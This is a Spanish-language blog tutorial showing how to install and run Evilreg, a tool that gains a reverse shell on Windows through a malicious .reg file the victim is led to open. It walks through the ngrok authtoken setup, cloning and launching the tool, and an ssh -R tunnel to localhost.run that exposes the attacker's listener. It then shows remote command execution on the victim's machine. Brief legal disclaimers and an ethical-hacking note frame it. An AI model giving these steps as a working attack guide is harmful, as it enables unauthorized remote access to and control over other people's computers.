Descarga tu guía de trucos informáticos aquí
EVILREG Reverse Shell registro Windows

EVILREG: Reverse Shell con Archivo Registro de Windows

Evilreg es un shell inverso que utiliza archivos de registro de Windows (.reg). La víctima confirma la ejecución de dicho archivo y obtenemos una conexión remota.

Este herramienta utiliza Ngrok.io para el reenvío de puerto TCP inverso. A continuación, se indican sus requisitos:


Ngrok authtoken
Ngrok authtoken
  • Instala tu auhtoken con el siguiente comando:
./ngrok authtoken <TU_AUTHTOKEN>
  • La víctima deberá reiniciar/cerrar sesión después de instalar el archivo .reg

Advertencia!

El uso de Evilreg para atacar objetivos sin previo consentimiento mutuo es ilegal. Es responsabilidad del usuario final obedecer todas las leyes locales, estatales y federales aplicables. Los desarrolladores, ni Esgeeks, asumen ninguna responsabilidad y no son responsables del mal uso o daño causado por este programa..

2. Instalar y usar Evilreg

View this post on Instagram

😈 EVILREG: Reverse Shell Hacking Windows 🦍 . 🅷🅰🅲🅺🅸🅽🅶 🆆🅸🅽🅳🅾🆆🆂 . Shell inverso que utiliza archivos de registro de Windows (.reg) . ♥ Si te gustó el vídeo dale ♥ Comenta con 🦍 si deseas más contenido similar . EXPLICACIÓN COMPLETA: https://esgeeks.com/?p=9770 . . 🎯 w w w . e s g e e k s . c o m . . 👉 Sigue a EsGeeks en Instagram: @EsGeeks 👉 Sigue a EsGeeks en Facebook: @EsGeeksOficial 👉 Sigue a EsGeeks en Twitter: @EsGeeks 👉 Sigue a EsGeeks en Telegram: https://t.me/EsGeeks 👉 Sigue a EsGeeks en Discord: https://discord.gg/EyY6SPW . . ⚠️ Recuerda respetar cualquier derecho de autoría. [Descargo de Responsabilidad] Ni el autor ni @Esgeeks es responsable por el uso que realices con esta herramienta. . . 📑 Copyright 2020: Picture by EsGeeks & Audio by Audioblocks . . #EsGeeks #Hacking #Hacker #hackers #github #termuxhacking #hackingnews #ethicalhacking #hackingtools #pentesting #scripts #parrotos #kalilinux #cracking #hacked #anonymous #linux #cybersecurity #cybercrime #blackhat #ReverseShell #HackingWindows #Metasploit #meterpreter

A post shared by ESGEEKS (@esgeeks) on

Empecemos. Clonamos desde el repositorio y accedemos a la carpeta del programa con los siguientes comandos:

git clone https://github.com/thelinuxchoice/evilreg
cd evilreg
Instalar Evilreg Linux
Instalar Evilreg Linux

Dentro de la ubicación de la carpeta de EvilReg, iniciamos el programa con el siguiente comando:

bash evilreg.sh
Interfaz Evilreg
Interfaz Evilreg

A continuación, relleno los otros campos solicitados como son: nombre de payload (esgeeks) y redireccionamiento de página (https://esgeeks.com). Lo que he colocado entre paréntesis lo puedes modificar a tu gusto. Sigamos…

Reverse TCP para archivo registro Windows
Reverse TCP para archivo registro Windows

En pantalla aparecerá un nuevo comando que debemos en una nueva ventana de terminal para obtener una URL personalizada de nuestro ataque. Yo he colocado lo siguiente.

ssh -R 80:localhost:3333 esgeeks@ssh.localhost.run

Cuando la víctima abre el enlace, podemos ver en pantalla algo como lo siguiente: Tenemos una sesión de consola abierta.


Acceso remoto CMD Windows
Acceso remoto CMD Windows

Entonces, podemos ejecutar comandos como si estuviéramos en el CMD. Por ejemplo:

Hacking CMD Windows
Hacking CMD Windows

Aquí hay otra captura:

CMD remoto Linux
CMD remoto Linux

¡Voila!

3. Conclusión

Si estás interesado en hackear puedes aprenderlo y trabajar como hacker ético. Un hacker ético ‘hackea’ otros PC, laptops o teléfono Android por una buena razón. Las grandes empresas y organizaciones designan hackers por su seguridad. Sigue el camino del hacking ético y no intentes entrar en la vida privada de nadie, ya que podrías terminar siendo procesado o encarcelado.

Contenido relacionado:

Si te gusta el contenido y deseas apoyar a la mejora del sitio web, considera hacer una contribución ¡haciendo clic aquí por favor!. ¡NO ES OBLIGATORIO, GRACIAS! :’)

¿Te ha gustado este artículo? Sigue este blog en su fanpage de  Facebook, TELEGRAM, Discord, TwitterInstagram y/o YouTube para que no te pierdas del mejor contenido informático y hacking!